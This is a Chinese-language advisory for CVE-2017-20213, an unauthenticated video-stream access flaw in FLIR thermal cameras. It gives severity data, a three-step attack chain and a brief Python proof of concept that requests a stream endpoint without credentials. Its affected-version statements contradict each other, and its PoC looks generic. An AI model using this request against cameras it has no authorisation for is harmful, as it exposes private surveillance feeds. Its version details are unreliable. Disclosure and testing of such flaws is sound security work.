CVE-2017-20213: FLIR热成像摄像头未授权访问漏洞

漏洞信息

漏洞编号

CVE-2017-20213

漏洞类型

未授权访问/认证绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FLIR Thermal Camera F/FC/PT/D Stream

漏洞概述

FLIR Thermal Camera F/FC/PT/D Stream固件版本8.0.0.64存在严重安全漏洞，允许远程攻击者无需任何认证即可访问实时视频流。该漏洞影响多个摄像头系列，攻击者可通过网络直接获取未授权的热成像视频流，对系统机密性造成严重影响。

技术细节

漏洞源于固件中缺少适当的身份验证机制。攻击者可直接构造请求访问视频流端点，无需提供有效凭证即可获取实时视频数据。

攻击链分析

STEP 1

1

攻击者识别目标FLIR摄像头IP地址

STEP 2

2

构造未授权访问请求直接获取视频流

STEP 3

3

成功接收实时热成像视频数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

python
import requests

target = 'http://target-ip:80'
stream_url = f'{target}/cgi-bin/stream'

response = requests.get(stream_url)
print(f'Status: {response.status_code}')
print(f'Content: {response.content[:100]}')

影响范围

FLIR Thermal Camera F/FC/PT/D Stream < 8.0.0.64

防御指南

临时缓解措施

立即断开受影响设备的网络连接，并联系厂商获取安全补丁